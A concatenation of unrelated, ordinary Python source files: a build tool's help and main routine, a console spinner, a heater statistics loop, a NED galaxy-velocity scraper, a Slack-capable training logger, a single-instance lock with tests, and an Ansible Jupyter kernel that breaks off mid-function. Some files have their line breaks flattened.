libs_help(config): print("libs help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("builds tools and third-party libraries:") print("\njsn syntax: array of [cmdlines, ..]") print("libs: [") print(" [\"command line\"],") print(" ...") print("]\n") print("reguires:") print(" config[\"env\"][\"pmtech_dir\"]") print(" win32:") print(" config[\"sdk_version\"]") print(" config[\"vcvarsall_dir\"]") print("\n") def premake_help(config): print("premake help -------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("generate ide projects or make files from lua descriptions:") print("\njsn syntax: array of [<action>, cmdline options..]") print("premake: [") print(" [\"<action> (vs2017, xcode4, gmake, android-studio)\"],") print(" [\"--premake_option <value>\"],") print(" ...") print("]\n") print("reguires: config[\"env\"][\"pmtech_dir\"]\n") cmd = tool_to_platform(config["tools"]["premake"]) cmd += " --help" subprocess.call(cmd, shell=True) print("\n") def pmfx_help(config): print("pmfx help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("compile platform specific shaders:") print("\njsn syntax: array of [cmdline options, ..]") print("pmfx: [") print(" [\"-pmfx_option <value>\"],") print(" ...") print("]\n") cmd = python_tool_to_platform(config["tools"]["pmfx"]) cmd += " -help" subprocess.call(cmd, shell=True) print("\n") def models_help(config): print("models help --------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("create binary pmm and pma model files from collada files:") print("\njsn syntax: array of [src, dst] pairs.") print("models: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("accepted file formats: .dae, .obj") print("\n") def textures_help(config): print("textures help ------------------------------------------------------------------") print("--------------------------------------------------------------------------------") 
print("convert, re-size or compress textures:") print("\njsn syntax: array of [src, dst] pairs.") print("copy: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("export.jsn:") print("{") print(" format: \"RGBA8\"") print(" filename.png {") print(" format: \"override_per_file\"") print(" }") print("}\n") tool_cmd = tool_to_platform(config["tools"]["texturec"]) subprocess.call(tool_cmd + " --help", shell=True) subprocess.call(tool_cmd + " --formats", shell=True) print("\n") def copy_help(config): print("copy help ----------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("copy files from src to dst:") print("\njsn syntax: array of [src, dst] pairs.") print("copy: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("\n") def jsn_help(config): print("jsn help ----------------------------------------------------------------------") print("-------------------------------------------------------------------------------") print("convert jsn to json:") print("\njsn syntax: array of [src, dst] pairs.") print("jsn: [") print(" [<src files, directories or wildcards>, <dst file or folder>],") print(" ...") print("]") print("\n") def build_help(config): print("build help ----------------------------------------------------------------------") print("---------------------------------------------------------------------------------") print("\njsn syntax: array of commands.") print("build: [") print(" command args args args,") print(" ...") print("]") print("\n") def cr_help(config): print("cr help -------------------------------------------------------------------------") print("---------------------------------------------------------------------------------") print("generate cfunction pointers for calling from fungos/cr") print("\njsn syntax: array of commands.") print("cr: {") print(" files:[...], output: <filepath>") print("}") print("\n") # print duration of job, ts is start time def print_duration(ts): millis = int((time.time() - ts) * 1000) print("--------------------------------------------------------------------------------") print("Took (" + str(millis) + "ms)") # main function def main(): start_time = time.time() # must have config.json in working directory if not os.path.exists("config.jsn"): print("[error] no config.json in current directory.") exit(1) # load jsn, inherit etc config_all = jsn.loads(open("config.jsn", "r").read()) # top level help if "-help" in sys.argv or len(sys.argv) == 1: if len(sys.argv) <= 2: pmbuild_help(config_all) exit(0) call = "run" if "-help" in sys.argv: call = "help" # first arg is build profile if call == "run": config = config_all[sys.argv[1]] # load config user for user specific values (sdk version, vcvarsall.bat etc.) 
configure_user(config, sys.argv) if "-cfg" in sys.argv: print(json.dumps(config, indent=4)) else: config = config_all["base"] # tasks are executed in order they are declared here tasks = collections.OrderedDict() tasks["vs_version"] = {"run": run_vs_version, "help": vs_version_help} tasks["libs"] = {"run": run_libs, "help": libs_help} tasks["premake"] = {"run": run_premake, "help": premake_help} tasks["pmfx"] = {"run": run_pmfx, "help": pmfx_help} tasks["models"] = {"run": run_models, "help": models_help} tasks["textures"] = {"run": run_textures, "help": textures_help} tasks["jsn"] = {"run": run_jsn, "help": jsn_help} tasks["copy"] = {"run": run_copy, "help": copy_help} tasks["build"] = {"run": run_build, "help": build_help} tasks["cr"] = {"run": run_cr, "help": cr_help} # clean is a special task, you must specify separately if "-clean" in sys.argv: if call == "help": clean_help(config) else: run_clean(config) # run tasks in order they are specified. for key in tasks.keys(): if call == "run": if key not in config.keys(): continue ts = time.time() run = False # check flags to include or exclude jobs if "-all" in sys.argv and "-n" + key not in sys.argv: run = True elif len(sys.argv) != 2 and "-" + key in sys.argv: run = True elif len(sys.argv) == 2: run = True # run job if run: tasks.get(key, lambda config: '')[call](config) print_duration(ts) # finally metadata for rebuilding and hot reloading generate_pmbuild_config(config, sys.argv[1]) print("--------------------------------------------------------------------------------") print("all jobs complete --------------------------------------------------------------") print_duration(start_time) # entry point of pmbuild if __name__ == "__main__": print("--------------------------------------------------------------------------------") print("pmbuild (v3) -------------------------------------------------------------------") print("--------------------------------------------------------------------------------") print("") main()
spinner.py
#!/usr/bin/env python
import itertools
import sys
import time
import threading
import platform


class Spinner(object):
    # Use an emoji animation on macOS, otherwise fall back to an ASCII spinner.
    spinner_cycle = [
        " [🥞 ]",
        " [ 🥞 ]",
        " [ 🥞 ]",
        " [ 🥞]",
        " [ 🥞 ]",
        " [ 🥞 ]",
        " [🥞 ]",
    ] if platform.system() == "Darwin" else itertools.cycle(['-', '/', '|', '\\'])
    i = 0

    def __init__(self):
        self.emojiSupported = platform.system() == "Darwin"
        self.stop_running = threading.Event()
        self.spin_thread = threading.Thread(target=self.init_spin)

    def start(self):
        self.spin_thread.start()

    def stop(self):
        try:
            self.stop_running.set()
            self.spin_thread.join()
        except Exception:
            pass

    def init_spin(self):
        while not self.stop_running.is_set():
            if self.emojiSupported:
                # the emoji frames live in a list, so index it with a rolling counter
                print(self.spinner_cycle[self.i % len(self.spinner_cycle)], end="\r")
                time.sleep(.1)
                self.i += 1
            else:
                # itertools.cycle yields frames forever; erase each one with a backspace
                sys.stdout.write(next(self.spinner_cycle))
                sys.stdout.flush()
                time.sleep(0.25)
                sys.stdout.write('\b')
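# A minimal usage sketch, not part of the original module: wrap a slow,
# blocking call with the spinner so the terminal keeps animating. The
# time.sleep(2) below is purely a stand-in for real work.
if __name__ == "__main__":
    s = Spinner()
    s.start()
    try:
        time.sleep(2)  # placeholder for the long-running task
    finally:
        s.stop()  # sets the stop event and joins the spinner thread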
Statistik.py
# -*- coding: utf-8 -*-
import Tools
import sensor_temperature_control as TempSensor
import math
import time
import threading

runStatistik = True


def setStatistik():
    global runStatistik
    runStatistik = True
    # start a thread that waits until the statistics view is closed by the user
    thread_temp = threading.Thread(target=__stopStatistik).start()
    print("Fetching values for statistics")
    while runStatistik:
        print("new round")
        ## TempRauchgas = TempSensor.getTempRauchgas()
        ## TempRaum = TempSensor.getTempRaumTemp()
        ## if TempRauchgas < 0:
        ##     TempRauchgas = 0
        ## if TempRaum < 0:
        ##     TempRaum = 0
        ## Tools.sendcommand('add 9,1,' + math.ceil(TempRauchgas))
        ## Tools.sendcommand('add 9,2,' + math.ceil(TempRaum))
        ## print("Writing temperature to statistics (flue gas): " + TempRauchgas)
        ## print("Writing temperature to statistics (room): " + TempRaum)
        Tools.sendcommand("add 9,1,150")
        Tools.sendcommand("add 9,0,100")
        time.sleep(0.5)


def __stopStatistik():
    global runStatistik
    Tools.leereInputBuffer()  # clear the input buffer
    if Tools.recievecommand() == "s9b0":
        print("Statistics view was closed by the user")
        runStatistik = False
velocities.py
import requests
import itertools
import threading
import time
import sys
from bs4 import BeautifulSoup


def animate():
    # simple console spinner that runs until the main loop sets `done`
    for c in itertools.cycle(['|', '/', '-', '\\']):
        if done:
            break
        sys.stdout.write('\rloading ' + c)
        sys.stdout.flush()
        time.sleep(0.1)
    print(chr(27) + "[2J")
    sys.stdout.write('\rDone!')


def getVelocities(name, link):
    inputs = {'objname': name, 'extend': 'no', 'hconst': '73', 'omegam': '0.27',
              'omegav': '0.73', 'corr_z': '1', 'out_csys': 'Equatorial',
              'out_equinox': 'J2000.0', 'obj_sort': "RA or Longitude",
              'of': 'pre_text', 'zv_breaker': '30000.0', 'list_limit': '5',
              'img_stamp': 'YES'}
    page = requests.get(link, params=inputs)
    soup = BeautifulSoup(page.content, 'html.parser')

    # -------Get Velocities-----#
    velocities = soup.find_all('pre')[5]
    Helio = list(velocities.children)[2]
    VGS = list(velocities.children)[16]
    Helio = Helio.lstrip('\n')
    VGS = VGS.lstrip('\n')
    Hvals = [int(s) for s in Helio.split() if s.isdigit()]
    VGSVals = [int(s) for s in VGS.split() if s.isdigit()]
    # -----End Get Velocities-----#

    # -----Get Diameters-----#
    diameters = soup.find_all('table')[22]
    at = diameters.find('tr')
    print(at.get_text())
    diameters = diameters.find_all('tr')[0]
    major = diameters.find_all('td')[1].get_text()
    minor = diameters.find_all('td')[2].get_text()
    # -----End Get Diameters-----#

    write_file = 'Data.csv'
    with open(write_file, 'a') as output:
        output.write(name + ',' + str(Hvals[0]) + ',' + str(Hvals[1]) + ',' +
                     str(VGSVals[0]) + ',' + str(VGSVals[1]) + ',' +
                     major + ',' + minor + '\n')


# -----SETUP-----#
link = "https://ned.ipac.caltech.edu/cgi-bin/objsearch?"
gals = []
can_read = False
while can_read == False:
    choice = input("Enter [1] to enter galaxies by hand. Enter [2] to import a .txt file of names.\n")
    if choice == '1':
        galaxies = input("Enter galaxies separated by commas: Ex. M82, M83\n")
        for x in galaxies.split(','):
            gals.append(x.strip())
        can_read = True
    elif choice == '2':
        file = input("What is the name of the file? Ex. galaxies.txt\n\n")
        with open(file) as inp:
            gals = inp.read().splitlines()
        can_read = True
    else:
        print("Please enter either [1] or [2]\n\n")

done = False
print(chr(27) + "[2J")
threader = threading.Thread(target=animate)
threader.start()

write_file = 'Data.csv'
with open(write_file, 'w') as output:
    output.write("Name, Heliocentric Velocity (km/s), Uncertainty (km/s), VGS Velocity (km/s), "
                 "Uncertainty (km/s), Apparent Major Axis (arcsec), Apparent Minor Axis (arcsec)\n")

for i in range(0, len(gals)):
    name = gals[i]
    getVelocities(name, link)

done = True
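# Illustrative sketch (the sample line below is made up, not scraped from NED):
# the integer-extraction idiom used in getVelocities pulls a velocity and its
# uncertainty out of a whitespace-separated line.
sample = "Helio. Radial Velocity : 1234 +/- 5 km/s"
values = [int(s) for s in sample.split() if s.isdigit()]
assert values == [1234, 5]  # velocity first, uncertainty second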
infolog.py
import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen

_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None


def init(filename, run_name, slack_url=None):
    global _file, _run_name, _slack_url
    _close_logfile()
    _file = open(filename, 'a')
    _file.write('\n-----------------------------------------------------------------\n')
    _file.write('Starting new training run\n')
    _file.write('-----------------------------------------------------------------\n')
    _file.flush()
    _run_name = run_name
    _slack_url = slack_url


def log(msg, slack=False):
    print(msg, flush=True)
    if _file is not None:
        _file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
        _file.flush()
    if slack and _slack_url is not None:
        Thread(target=_send_slack, args=(msg,)).start()


def _close_logfile():
    global _file
    if _file is not None:
        _file.close()
        _file = None


def _send_slack(msg):
    req = Request(_slack_url)
    req.add_header('Content-Type', 'application/json')
    urlopen(req, json.dumps({
        'username': 'tacotron',
        'icon_emoji': ':taco:',
        'text': '*%s*: %s' % (_run_name, msg)
    }).encode())


atexit.register(_close_logfile)
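# A small usage sketch (the log filename and run name below are made up):
# without a slack_url, messages flagged slack=True are simply printed and
# written to the log file.
if __name__ == '__main__':
    init('training.log', run_name='demo-run')
    log('Starting step 0')
    log('Loss improved', slack=True)  # would also post to Slack if a slack_url were configured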
singleton.py
#! /usr/bin/env python
import logging
from multiprocessing import Process
import os
import sys
import tempfile
import unittest


class SingleInstanceException(BaseException):
    pass


class SingleInstance(object):
    """Class that can be instantiated only once per machine.

    If you want to prevent your script from running in parallel just
    instantiate SingleInstance() class. If is there another instance already
    running it will throw a `SingleInstanceException`.

    >>> import tendo
    ... me = SingleInstance()

    This option is very useful if you have scripts executed by crontab at
    small amounts of time.

    Remember that this works by creating a lock file with a filename based
    on the full path to the script file.

    Providing a flavor_id will augment the filename with the provided
    flavor_id, allowing you to create multiple singleton instances from the
    same file. This is particularly useful if you want specific functions to
    have their own singleton instances.
    """

    def __init__(self, flavor_id="", lockfile=""):
        import sys
        self.initialized = False
        if lockfile:
            self.lockfile = lockfile
        else:
            basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace(
                "/", "-").replace(":", "").replace("\\", "-") + '-%s' % flavor_id + '.lock'
            self.lockfile = os.path.normpath(
                tempfile.gettempdir() + '/' + basename)

        logger.debug("SingleInstance lockfile: " + self.lockfile)
        if sys.platform == 'win32':
            try:
                # file already exists, we try to remove (in case previous
                # execution was interrupted)
                if os.path.exists(self.lockfile):
                    os.unlink(self.lockfile)
                self.fd = os.open(
                    self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
            except OSError:
                type, e, tb = sys.exc_info()
                if e.errno == 13:
                    logger.error(
                        "Another instance is already running, quitting.")
                    raise SingleInstanceException()
                print(e.errno)
                raise
        else:  # non Windows
            import fcntl
            self.fp = open(self.lockfile, 'w')
            self.fp.flush()
            try:
                fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
            except IOError:
                logger.warning(
                    "Another instance is already running, quitting.")
                raise SingleInstanceException()
        self.initialized = True

    def __del__(self):
        import os
        import sys
        if not self.initialized:
            return
        try:
            if sys.platform == 'win32':
                if hasattr(self, 'fd'):
                    os.close(self.fd)
                    os.unlink(self.lockfile)
            else:
                import fcntl
                fcntl.lockf(self.fp, fcntl.LOCK_UN)
                # os.close(self.fp)
                if os.path.isfile(self.lockfile):
                    os.unlink(self.lockfile)
        except Exception as e:
            if logger:
                logger.warning(e)
            else:
                print("Unloggable error: %s" % e)
            sys.exit(-1)


def f(name):
    tmp = logger.level
    logger.setLevel(logging.CRITICAL)  # we do not want to see the warning
    try:
        me2 = SingleInstance(flavor_id=name)  # noqa
    except SingleInstanceException:
        sys.exit(-1)
    logger.setLevel(tmp)
    pass


class testSingleton(unittest.TestCase):

    def test_1(self):
        me = SingleInstance(flavor_id="test-1")
        del me  # now the lock should be removed
        assert True

    def test_2(self):
        p = Process(target=f, args=("test-2",))
        p.start()
        p.join()
        # the called function should succeed
        assert p.exitcode == 0, "%s != 0" % p.exitcode

    def test_3(self):
        me = SingleInstance(flavor_id="test-3")  # noqa -- me should still kept
        p = Process(target=f, args=("test-3",))
        p.start()
        p.join()
        # the called function should fail because we already have another
        # instance running
        assert p.exitcode != 0, "%s != 0 (2nd execution)" % p.exitcode
        # note, we return -1 but this translates to 255 meanwhile we'll
        # consider that anything different from 0 is good
        p = Process(target=f, args=("test-3",))
        p.start()
        p.join()
        # the called function should fail because we already have another
        # instance running
        assert p.exitcode != 0, "%s != 0 (3rd execution)" % p.exitcode

    def test_4(self):
        lockfile = '/tmp/foo.lock'
        me = SingleInstance(lockfile=lockfile)
        assert me.lockfile == lockfile


logger = logging.getLogger("tendo.singleton")
logger.addHandler(logging.StreamHandler())

if __name__ == "__main__":
    logger.setLevel(logging.DEBUG)
    unittest.main()
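# A minimal usage sketch, assuming this module is importable and that the
# snippet lives in its own cron-driven script (both are assumptions; the
# flavor_id below is hypothetical).
def _example_guarded_job():
    try:
        guard = SingleInstance(flavor_id="my-cron-job")
    except SingleInstanceException:
        sys.exit(-1)
    # ... the actual work runs here, in the single surviving process ...
    del guard  # dropping the instance releases the lock file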
kernel.py
from __future__ import print_function from ipykernel.kernelbase import Kernel from ipykernel.comm import CommManager from ipykernel.zmqshell import ZMQInteractiveShell from IPython.core.display_trap import DisplayTrap from subprocess import check_output from traitlets import Instance, Type import pkg_resources import atexit import time import os import re import yaml import threading from subprocess import Popen, STDOUT, PIPE import logging import json import traceback import tempfile import six import pprint import shutil from pprint import pformat from six.moves import queue from collections import namedtuple, defaultdict import zmq from zmq.eventloop.zmqstream import ZMQStream from .modules import modules from .module_args import module_args from .task_args import task_args from .play_args import play_args from six.moves import configparser from zmq.eventloop.ioloop import IOLoop import ansible_runner StatusMessage = namedtuple('StatusMessage', ['message']) TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num']) TASK_ARGS_MODULES = modules + task_args __version__ = '1.0.0' logger = logging.getLogger('ansible_kernel.kernel') version_pat = re.compile(r'version (\d+(\.\d+)+)') DEBUG = False def ensure_directory(d): if not os.path.exists(d): os.mkdir(d) class _NullDisplay(object): def __init__(self): self.exec_result = None def __call__(self, result): logger.debug("NullDisplay %s", result) self.exec_result = result NullDisplay = _NullDisplay() NullDisplayTrap = DisplayTrap(hook=NullDisplay) class Splitter(object): def __init__(self, channels): self.channels = channels def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s', msg, args, kwargs) for channel in self.channels: result = channel.send_multipart(msg, *args, **kwargs) logger.debug('result %s', result) class AnsibleKernelHelpersThread(object): def __init__(self, queue): self.queue = queue self.io_loop = IOLoop(make_current=False) context = zmq.Context.instance() self.pause_socket = context.socket(zmq.REP) self.pause_socket_port = self.pause_socket.bind_to_random_port( "tcp://127.0.0.1") self.status_socket = context.socket(zmq.PULL) self.status_socket_port = self.status_socket.bind_to_random_port( "tcp://127.0.0.1") self.pause_stream = ZMQStream(self.pause_socket, self.io_loop) self.status_stream = ZMQStream(self.status_socket, self.io_loop) self.pause_stream.on_recv(self.recv_pause) self.status_stream.on_recv(self.recv_status) self.thread = threading.Thread(target=self._thread_main) self.thread.daemon = True def start(self): logger.info('thread.start') self.thread.start() atexit.register(self.stop) def stop(self): logger.info('thread.stop start') if not self.thread.is_alive(): return self.io_loop.add_callback(self.io_loop.stop) self.thread.join() logger.info('thread.stop end') def recv_status(self, msg): logger.info(msg) self.queue.put(StatusMessage(json.loads(msg[0]))) def recv_pause(self, msg): logger.info("completed %s waiting...", msg) self.queue.put(TaskCompletionMessage(json.loads(msg[0]))) def _thread_main(self): """The inner loop that's actually run in a thread""" self.io_loop.make_current() self.io_loop.start() self.io_loop.close(all_fds=True) class AnsibleKernel(Kernel): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) shell_class = Type(ZMQInteractiveShell) implementation = 'ansible_kernel' implementation_version = __version__ @property def language_version(self): m = version_pat.search(self.banner) return m.group(1) _banner = None 
@property def banner(self): if self._banner is None: self._banner = check_output( ['ansible', '--version']).decode('utf-8') return self._banner language_info = {'name': 'ansible', 'codemirror_mode': 'yaml', 'mimetype': 'text/yaml', 'file_extension': '.yml'} help_links = [ { 'text': 'Ansible Reference', 'url': 'https://docs.ansible.com/ansible/latest/index.html' } ] def __init__(self, **kwargs): start_time = time.time() Kernel.__init__(self, **kwargs) logger.debug("session %s %s", type(self.session), self.session) logger.debug("iopub_socket %s %s", type(self.iopub_socket), self.iopub_socket) self.original_iopub_socket = self.iopub_socket self.iopub_socket = Splitter([self.original_iopub_socket, self]) self.user_ns = {} self.shell = self.shell_class.instance(parent=self, profile_dir=self.profile_dir, user_ns=self.user_ns, kernel=self) self.shell.displayhook.session = self.session self.shell.displayhook.pub_socket = self.iopub_socket self.shell.displayhook.topic = self._topic('execute_result') self.shell.display_pub.session = self.session self.shell.display_pub.pub_socket = self.iopub_socket self.comm_manager = CommManager(parent=self, kernel=self) self.shell.configurables.append(self.comm_manager) self.shell_handlers['comm_open'] = self.comm_open self.shell_handlers['comm_msg'] = self.comm_msg self.shell_handlers['comm_close'] = self.comm_close self.ansible_cfg = None self.ansible_process = None self.current_play = None self.next_task_file = None self.task_files = [] self.registered_variable = None self.playbook_file = None self.silent = False self.runner = None self.runner_thread = None self.shutdown_requested = False self.shutdown = False self.widgets = defaultdict(dict) self.widget_update_order = 0 self.vault_password = None self.default_inventory = "[all]\nlocalhost ansible_connection=local\n" self.default_play = yaml.dump(dict(hosts='localhost', name='default', gather_facts=False)) self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook") self.queue = None self.tasks_counter = 0 self.current_task = None logger.debug(self.temp_dir) ensure_directory(os.path.join(self.temp_dir, 'env')) ensure_directory(os.path.join(self.temp_dir, 'project')) self.copy_files() ensure_directory(os.path.join(self.temp_dir, 'project', 'roles')) with open(os.path.join(self.temp_dir, 'env', 'settings'), 'w') as f: f.write(json.dumps(dict(idle_timeout=0, job_timeout=0))) self.do_inventory(self.default_inventory) self.shell.run_code("import json") self.do_execute_play(self.default_play) logger.info("Kernel init finished took %s", time.time() - start_time) def copy_files(self): src = os.path.abspath('.') dest = os.path.join(self.temp_dir, 'project') src_files = os.listdir(src) for file_name in src_files: full_file_name = os.path.join(src, file_name) if (os.path.isfile(full_file_name)): shutil.copy(full_file_name, dest) if (os.path.isdir(full_file_name)): shutil.copytree(full_file_name, os.path.join(dest, file_name)) def start_helper(self): self.queue = queue.Queue() self.helper = AnsibleKernelHelpersThread(self.queue) self.helper.start() self.process_widgets() logger.info("Started helper") config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) if not config.has_section('defaults'): config.add_section('defaults') if config.has_option('defaults', 'roles_path'): roles_path = config.get('defaults', 'roles_path') roles_path = 
":".join([os.path.abspath(x) for x in roles_path.split(":")]) roles_path = "{0}:{1}".format(roles_path, os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles'))) config.set('defaults', 'roles_path', roles_path) else: config.set('defaults', 'roles_path', os.path.abspath( pkg_resources.resource_filename('ansible_kernel', 'roles'))) logger.debug("vault_password? %s", self.vault_password and not config.has_option('defaults', 'vault_password_file')) if self.vault_password and not config.has_option('defaults', 'vault_password_file'): vault_password_file = os.path.join(self.temp_dir, 'project', 'vault-secret') with open(vault_password_file, 'w') as vpf: vpf.write(self.vault_password) config.set('defaults', 'vault_password_file', vault_password_file) if not config.has_section('callback_ansible_kernel_helper'): config.add_section('callback_ansible_kernel_helper') config.set('callback_ansible_kernel_helper', 'status_port', str(self.helper.status_socket_port)) with open(os.path.join(self.temp_dir, 'project', 'ansible.cfg'), 'w') as f: config.write(f) logger.info("Wrote ansible.cfg") def rewrite_ports(self): with open(self.playbook_file, 'r') as f: playbook = yaml.load(f.read(), Loader=yaml.FullLoader) playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) def clean_up_task_files(self, backup=False): for task_file in self.task_files: if backup: shutil.copy(task_file, task_file + ".bak") if os.path.exists(task_file): os.unlink(task_file) self.task_files = [] def runner_process_message(self, data): logger.info("runner message:\n{}".format(pprint.pformat(data))) try: event_data = data.get('event_data', {}) task = event_data.get('task') role = event_data.get('role', None) event = data.get('event') if DEBUG: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) if event == 'playbook_on_start': pass elif event == 'playbook_on_play_start': pass elif event == 'playbook_on_stats': pass elif event == 'playbook_on_include': pass elif event == 'runner_on_start': pass elif event == 'playbook_on_task_start': logger.debug('playbook_on_task_start') task_args = event_data.get('task_args', []) task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStart', dict(task_name=task, role_name=role, task_arg=task_args, task_id=task_uuid)])) elif event == 'runner_on_ok': logger.debug('runner_on_ok') results = event_data.get('res', {}) device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, delegated_host_name=device_name, changed=results.get('changed', False), failed=False, unreachable=False, skipped=False, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_failed': device_name = event_data.get('host') task_uuid = data.get('uuid', '') results = event_data.get('res', {}) self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=True, unreachable=False, skipped=False, delegated_host_name=device_name, 
application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_unreachable': device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=False, unreachable=True, skipped=False, task_id=task_uuid)])) elif event == 'error': self.queue.put(StatusMessage(['Error', dict(stdout=data.get('stdout', ''))])) else: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) except BaseException: logger.error(traceback.format_exc()) def process_message(self, message): logger.info("message %s", message) stop_processing = False message_type = message[0] message_data = message[1] logger.info("message_type %s", message_type) logger.info("message_data %s", message_data) if message_data.get('task_name', '') == 'pause_for_kernel': logger.debug('pause_for_kernel') return stop_processing if message_data.get('task_name', '') == 'include_variables': return stop_processing if message_data.get('task_name', '') == 'include_vars': return stop_processing if message_data.get('task_name', '') == 'include_tasks': logger.debug('include_tasks') if message_type == 'TaskStatus' and message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] if message_data.get('results', None): output += " => " output += message_data['results'] output += "\n" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return stop_processing output = '' if message_type == 'TaskStart': logger.debug('TaskStart') task_name = message_data['task_name'] if message_data.get('role_name'): task_name = "%s : %s" % (message_data['role_name'], task_name) output = 'TASK [%s] %s\n' % (task_name, '*' * (72 - len(task_name))) elif message_type == 'DeviceStatus': logger.debug('DeviceStatus') pass elif message_type == 'PlaybookEnded': logger.debug('PlaybookEnded') output = "\nPlaybook ended\nContext lost!\n" self.do_shutdown(False) self.clean_up_task_files(True) self.start_helper() self.rewrite_ports() self.start_ansible_playbook() stop_processing = True elif message_type == 'TaskStatus': logger.debug('TaskStatus') if message_data.get('changed', False): logger.debug('changed') output = 'changed: [%s]' % message_data['device_name'] elif message_data.get('unreachable', False): logger.debug('unreachable') output = 'fatal: [%s]: UNREACHABLE!' % message_data['device_name'] elif message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' 
% message_data['device_name'] else: logger.debug('ok') output = 'ok: [%s]' % message_data['device_name'] if message_data.get('full_results', None) and self.registered_variable is not None: logger.debug('full_results %s', type(message_data.get('full_results'))) line1 = "import json" line2 = "{0} = globals().get('{0}', dict())".format(self.registered_variable) line3 = "{0}['{2}'] = json.loads('{1}')".format(self.registered_variable, message_data.get('full_results'), message_data['device_name']) for line in [line1, line2, line3]: logger.debug(line) self.shell.run_cell(line) if message_data.get('results', None): output += " => " output += message_data['results'] if message_data.get('output', None): output += "\n\n[%s] stdout:\n" % message_data['device_name'] output += message_data['output'] if message_data.get('error', None): output += "\n\n[%s] stderr:\n" % message_data['device_name'] output += message_data['error'] if message_data.get('application_python', None): self.shell.run_cell(message_data.get('application_python')) if message_data.get('text_html', None): self.send_response(self.iopub_socket, 'display_data', dict(source="", data={"text/html": message_data.get('text_html')})) output += "\n" elif message_type == 'Error': logger.debug('Error') output = message_data.get('stdout') else: output = str(message) logger.info("output %s", output) if not self.silent: # Send standard output logger.info("sending output") stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) else: logger.info("silent") logger.info("stop_processing %s", stop_processing) return stop_processing def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False): self.silent = silent if not code.strip(): return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} logger.debug('code %r', code) try: if code.strip().startswith("#inventory"): return self.do_inventory(code) elif code.strip().startswith("#ansible.cfg"): return self.do_ansible_cfg(code) elif code.strip().startswith("#host_vars"): return self.do_host_vars(code) elif code.strip().startswith("#group_vars"): return self.do_group_vars(code) elif code.strip().startswith("#vars"): return self.do_vars(code) elif code.strip().startswith("#template"): return self.do_template(code) elif code.strip().startswith("#task"): return self.do_execute_task(code) elif code.strip().startswith("#play"): return self.do_execute_play(code) elif code.strip().startswith("#python"): return self.do_execute_python(code) elif code.strip().startswith("#vault_password"): return self.do_execute_vault_password(code) else: return self.do_execute_task(code) except BaseException as e: logger.error(traceback.format_exc()) reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc().splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_traceback(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc(limit).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_error(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 
